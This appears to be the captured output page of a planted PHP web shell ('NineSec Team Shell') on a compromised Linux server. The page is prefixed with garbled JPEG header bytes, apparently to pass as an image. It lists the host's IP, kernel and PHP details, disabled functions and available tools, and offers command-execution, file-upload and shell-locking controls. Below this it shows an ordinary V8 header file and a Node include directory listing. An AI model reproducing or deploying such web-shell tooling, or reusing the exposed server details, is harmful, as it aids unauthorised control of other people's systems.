�����JFIF��������(ICC_PROFILE���������mntrRGB XYZ ������������acsp�������������������������������������-��������������������������������������������������� desc�������trXYZ��d���gXYZ��x���bXYZ������rTRC������(gTRC������(bTRC������(wtpt������cprt������ NineSec Team Shell
NineSec Team Shell
Server IP : 51.38.211.120  /  Your IP : 216.73.216.188
Web Server : Apache
System : Linux bob 5.15.85-1-pve #1 SMP PVE 5.15.85-1 (2023-02-01T00:00Z) x86_64
User : readytorun ( 1067)
PHP Version : 8.0.30
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF
Directory (0755) :  /srv/../opt/bitninja-python-dojo/../bitninja-node-dojo/include/node/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //srv/../opt/bitninja-python-dojo/../bitninja-node-dojo/include/node/v8-testing.h
// Copyright 2010 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

#ifndef V8_V8_TEST_H_
#define V8_V8_TEST_H_

#include "v8.h"  // NOLINT(build/include)

/**
 * Testing support for the V8 JavaScript engine.
 */
namespace v8 {

class V8_EXPORT Testing {
 public:
  enum StressType {
    kStressTypeOpt,
    kStressTypeDeopt
  };

  /**
   * Set the type of stressing to do. The default if not set is kStressTypeOpt.
   */
  static void SetStressRunType(StressType type);

  /**
   * Get the number of runs of a given test that is required to get the full
   * stress coverage.
   */
  static int GetStressRuns();

  /**
   * Indicate the number of the run which is about to start. The value of run
   * should be between 0 and one less than the result from GetStressRuns()
   */
  static void PrepareStressRun(int run);

  /**
   * Force deoptimization of all functions.
   */
  static void DeoptimizeAll(Isolate* isolate);
};


}  // namespace v8

#endif  // V8_V8_TEST_H_

NineSec Team - 2022
Name
Size
Last Modified
Owner
Permissions
Options
..
--
March 03 2023 8:02:22
root
0755
libplatform
--
February 12 2024 9:08:46
root
0755
openssl
--
February 12 2024 9:08:46
root
0755
uv
--
February 12 2024 9:08:46
root
0755
common.gypi
18.409 KB
December 13 2023 5:10:36
root
0644
config.gypi
3.016 KB
December 13 2023 5:10:36
root
0644
node.h
35.158 KB
December 13 2023 5:10:36
root
0644
node_api.h
36.854 KB
December 13 2023 5:10:36
root
0644
node_api_types.h
4.678 KB
December 13 2023 5:10:36
root
0644
node_buffer.h
3.398 KB
December 13 2023 5:10:36
root
0644
node_object_wrap.h
3.697 KB
December 13 2023 5:10:36
root
0644
node_version.h
3.856 KB
December 13 2023 5:10:36
root
0644
uv.h
62.506 KB
December 13 2023 5:10:36
root
0644
v8-inspector-protocol.h
0.501 KB
December 13 2023 5:10:36
root
0644
v8-inspector.h
9.98 KB
December 13 2023 5:10:36
root
0644
v8-platform.h
15.737 KB
December 13 2023 5:10:36
root
0644
v8-profiler.h
35.76 KB
December 13 2023 5:10:36
root
0644
v8-testing.h
1.05 KB
December 13 2023 5:10:36
root
0644
v8-util.h
19.381 KB
December 13 2023 5:10:36
root
0644
v8-value-serializer-version.h
0.633 KB
December 13 2023 5:10:36
root
0644
v8-version-string.h
1.12 KB
December 13 2023 5:10:36
root
0644
v8-version.h
0.754 KB
December 13 2023 5:10:36
root
0644
v8.h
339.145 KB
December 13 2023 5:10:36
root
0644
v8config.h
15.094 KB
December 13 2023 5:10:36
root
0644
zconf.h
15.916 KB
December 13 2023 5:10:36
root
0644
zlib.h
93.983 KB
December 13 2023 5:10:36
root
0644

NineSec Team - 2022